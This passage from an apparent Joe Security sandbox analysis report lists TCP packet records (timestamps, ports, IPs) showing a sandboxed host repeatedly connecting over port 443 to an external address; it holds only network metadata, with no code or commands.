Mai 7, 2018 14:50:35.242798090 MESZ 443 49179 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:35.243048906 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:35.249870062 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:35.250014067 MESZ 443 49179 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:35.250087976 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:35.416445017 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:35.416495085 MESZ 443 49180 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:35.416601896 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:35.417680979 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:35.417711973 MESZ 443 49180 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:36.371347904 MESZ 443 49180 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:36.371449947 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.507368088 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.507404089 MESZ 443 49180 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:36.513804913 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.513834000 MESZ 443 49180 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:36.751724005 MESZ 443 49180 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:36.751858950 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.751882076 MESZ 443 49180 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:36.752301931 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.752329111 MESZ 443 49180 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:36.752739906 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.752878904 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.753246069 MESZ 443 49180 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:36.753365993 MESZ 49180 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.881068945 MESZ 49181 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.881135941 MESZ 443 49181 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:36.881257057 MESZ 49181 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.882481098 MESZ 49181 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:36.882513046 MESZ 443 49181 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:37.597094059 MESZ 443 49181 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:37.597424984 MESZ 49181 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:37.619831085 MESZ 49181 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:37.619896889 MESZ 443 49181 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:37.628448009 MESZ 49181 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:37.628484011 MESZ 443 49181 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:38.197602034 MESZ 443 49181 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:38.197900057 MESZ 49181 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:38.197922945 MESZ 443 49181 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:38.200196981 MESZ 49181 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:38.200443983 MESZ 49181 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 49 of 149
Mai 7, 2018 14:50:38.200539112 MESZ 443 49181 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:38.200614929 MESZ 49181 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:38.321367025 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:38.321429968 MESZ 443 49182 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:38.321506977 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:38.322752953 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:38.322787046 MESZ 443 49182 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:38.880775928 MESZ 443 49182 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:38.880918026 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:38.935354948 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:38.935383081 MESZ 443 49182 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:38.943293095 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:38.943315029 MESZ 443 49182 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:39.156116962 MESZ 443 49182 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:39.156312943 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:39.156339884 MESZ 443 49182 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:39.159090996 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:39.159399033 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:39.159475088 MESZ 443 49182 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:39.163074970 MESZ 49182 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:39.405277967 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:39.405330896 MESZ 443 49183 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:39.405494928 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:39.406667948 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:39.406692982 MESZ 443 49183 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:40.033966064 MESZ 443 49183 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:40.034140110 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.499103069 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.499140024 MESZ 443 49183 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:40.507280111 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.507307053 MESZ 443 49183 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:40.767522097 MESZ 443 49183 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:40.768290997 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.768315077 MESZ 443 49183 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:40.769120932 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.769397020 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.769479990 MESZ 443 49183 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:40.769581079 MESZ 49183 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.894728899 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.894793987 MESZ 443 49184 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:40.894901991 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.896469116 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:40.896495104 MESZ 443 49184 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:41.553051949 MESZ 443 49184 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:41.553155899 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:41.570770979 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:41.570797920 MESZ 443 49184 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:41.577754021 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:41.577780962 MESZ 443 49184 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:41.882117987 MESZ 443 49184 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:41.882273912 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:41.882298946 MESZ 443 49184 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:41.882741928 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:42.071378946 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:42.071628094 MESZ 443 49184 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:42.071703911 MESZ 49184 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:42.193461895 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:42.193521023 MESZ 443 49185 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:42.193605900 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:42.194806099 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:42.194833040 MESZ 443 49185 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:42.883234024 MESZ 443 49185 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:42.883326054 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:42.893348932 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:42.893408060 MESZ 443 49185 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:42.899681091 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:42.899741888 MESZ 443 49185 91.92.137.74 192.168.1.81
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 50 of 149
Mai 7, 2018 14:50:43.117010117 MESZ 443 49185 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:43.117193937 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:43.117219925 MESZ 443 49185 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:43.117301941 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:43.117316008 MESZ 443 49185 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:43.117381096 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:43.117687941 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:43.118493080 MESZ 443 49185 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:43.118572950 MESZ 49185 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:43.295922995 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:43.295981884 MESZ 443 49186 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:43.296047926 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:43.297276020 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:43.297308922 MESZ 443 49186 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:44.343305111 MESZ 443 49186 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:44.343549967 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.359425068 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.359469891 MESZ 443 49186 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:44.366568089 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.366625071 MESZ 443 49186 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:44.759128094 MESZ 443 49186 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:44.759366035 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.759386063 MESZ 443 49186 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:44.759706974 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.759895086 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.760457993 MESZ 443 49186 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:44.760829926 MESZ 49186 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.881341934 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.881387949 MESZ 443 49187 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:44.881453037 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.882597923 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:44.882620096 MESZ 443 49187 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:45.361540079 MESZ 443 49187 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:45.361718893 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:45.374263048 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:45.374298096 MESZ 443 49187 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:45.397955894 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:45.397989035 MESZ 443 49187 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:45.742742062 MESZ 443 49187 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:45.742867947 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:45.742893934 MESZ 443 49187 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:45.747850895 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:45.747878075 MESZ 443 49187 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:45.751065969 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:45.940656900 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:45.940871954 MESZ 443 49187 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:45.940980911 MESZ 49187 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:46.064347029 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:46.064400911 MESZ 443 49188 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:46.064496994 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:46.066571951 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:46.066603899 MESZ 443 49188 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:46.842030048 MESZ 443 49188 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:46.842223883 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:46.853333950 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:46.853368044 MESZ 443 49188 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:46.859759092 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:46.859785080 MESZ 443 49188 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:47.082317114 MESZ 443 49188 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:47.082489014 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.082534075 MESZ 443 49188 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:47.083082914 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.083105087 MESZ 443 49188 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:47.084336042 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.148824930 MESZ 49188 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.149027109 MESZ 443 49188 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:47.150391102 MESZ 49188 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 51 of 149
Mai 7, 2018 14:50:47.269927025 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.269982100 MESZ 443 49189 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:47.270064116 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.271325111 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.271351099 MESZ 443 49189 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:47.791723013 MESZ 443 49189 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:47.791856050 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.811377048 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.811405897 MESZ 443 49189 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:47.820873022 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:47.820899010 MESZ 443 49189 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:48.010346889 MESZ 443 49189 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:48.010482073 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:48.010504007 MESZ 443 49189 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:48.011492014 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:48.011513948 MESZ 443 49189 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:48.012744904 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:48.018305063 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:48.018416882 MESZ 443 49189 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:48.018771887 MESZ 49189 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:48.928998947 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:48.929069042 MESZ 443 49190 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:48.929173946 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:48.931030035 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:48.931071043 MESZ 443 49190 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:49.664684057 MESZ 443 49190 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:49.664966106 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:49.677887917 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:49.677946091 MESZ 443 49190 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:49.689505100 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:49.689567089 MESZ 443 49190 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:50.074315071 MESZ 443 49190 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:50.074546099 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.074569941 MESZ 443 49190 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:50.074904919 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.074923038 MESZ 443 49190 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:50.075151920 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.075867891 MESZ 443 49190 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:50.076056957 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.076527119 MESZ 49190 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.190388918 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.190455914 MESZ 443 49191 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:50.190851927 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.192337036 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.192364931 MESZ 443 49191 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:50.945594072 MESZ 443 49191 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:50.945775986 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.955214024 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.955250025 MESZ 443 49191 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:50.961288929 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:50.961308956 MESZ 443 49191 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:51.156411886 MESZ 443 49191 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:51.156567097 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.156590939 MESZ 443 49191 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:51.158535004 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.158560991 MESZ 443 49191 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:51.159035921 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.198120117 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.198335886 MESZ 443 49191 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:51.199059963 MESZ 49191 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.312700033 MESZ 49192 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.312755108 MESZ 443 49192 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:51.313134909 MESZ 49192 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.314320087 MESZ 49192 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.314342022 MESZ 443 49192 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:51.890517950 MESZ 443 49192 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:51.890738964 MESZ 49192 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 52 of 149
Mai 7, 2018 14:50:51.901772976 MESZ 49192 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.901823044 MESZ 443 49192 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:51.908782005 MESZ 49192 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:51.908830881 MESZ 443 49192 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:52.412897110 MESZ 443 49192 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:52.413130045 MESZ 49192 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:52.413157940 MESZ 443 49192 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:52.422863960 MESZ 49192 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:52.493799925 MESZ 49192 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:52.493969917 MESZ 443 49192 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:52.495106936 MESZ 49192 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:52.609344959 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:52.609399080 MESZ 443 49193 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:52.609464884 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:52.610738993 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:52.610765934 MESZ 443 49193 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:53.250790119 MESZ 443 49193 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:53.250953913 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.265822887 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.265882969 MESZ 443 49193 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:53.273247957 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.273288012 MESZ 443 49193 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:53.728907108 MESZ 443 49193 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:53.729120970 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.729161978 MESZ 443 49193 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:53.729557991 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.729783058 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.730365038 MESZ 443 49193 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:53.730714083 MESZ 49193 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.855282068 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.855324984 MESZ 443 49194 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:53.855428934 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.856668949 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:53.856698990 MESZ 443 49194 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:54.925281048 MESZ 443 49194 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:54.925368071 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:54.938718081 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:54.938743114 MESZ 443 49194 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:54.945447922 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:54.945472956 MESZ 443 49194 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:55.191068888 MESZ 443 49194 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:55.191190004 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:55.191232920 MESZ 443 49194 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:55.191405058 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:55.192166090 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:55.192390919 MESZ 443 49194 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:55.192502975 MESZ 49194 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:55.318171978 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:55.318217993 MESZ 443 49195 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:55.318279982 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:55.319441080 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:55.319463968 MESZ 443 49195 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:56.210407972 MESZ 443 49195 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:56.210563898 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:56.471676111 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:56.471713066 MESZ 443 49195 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:56.478312016 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:56.478332043 MESZ 443 49195 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:57.055716991 MESZ 443 49195 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:57.055952072 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:57.055994987 MESZ 443 49195 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:57.056631088 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:57.057097912 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:57.057305098 MESZ 443 49195 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:57.058098078 MESZ 49195 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:57.177575111 MESZ 49196 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:57.177628040 MESZ 443 49196 91.92.137.74 192.168.1.81
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 53 of 149
Mai 7, 2018 14:50:57.177721977 MESZ 49196 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:57.179027081 MESZ 49196 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:57.179055929 MESZ 443 49196 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:58.508421898 MESZ 443 49196 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:58.508632898 MESZ 49196 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:58.520298004 MESZ 49196 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:58.520328045 MESZ 443 49196 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:58.526592016 MESZ 49196 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:58.526619911 MESZ 443 49196 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:59.078972101 MESZ 443 49196 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:59.079241037 MESZ 49196 443 192.168.1.81 91.92.137.74
